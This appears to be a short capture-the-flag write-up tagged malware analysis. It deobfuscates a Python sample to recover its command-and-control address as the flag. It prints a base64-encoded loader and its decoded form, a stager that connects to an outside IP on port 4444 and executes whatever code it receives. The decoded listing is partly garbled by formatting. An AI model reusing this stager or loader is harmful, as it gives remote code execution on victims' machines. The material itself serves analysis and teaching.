Tags: malware analysis 

Rating: 0

```
import requests
import base64

s = '755@vzzn'[::-1]
s += ':48684?:'[::-1]
s += '==@;:74>'[::-1]
s += 'y5=='[::-1]
s += 'in'[::-1]

url = ""
for i in s:
url +=chr(ord(i) - 6)

'''response = requests.get(url).content'''
response = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzI0NDYxNDM2MzInLDQ0NDQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))"
b64 = response.split("('")[1][:-4]
print base64.b64decode(b64)

'''
import socket,struct,time
for x in range(10):
try:
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('2446143632',4444))
break
except:
time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l: d+="s.recv(l-len(d))" exec(d,{'s':s})="" '''="" #2446143632=""> 145.205.48.144 (decimal ip)
#Flag : HZVI{145.205.48.144:4444}
```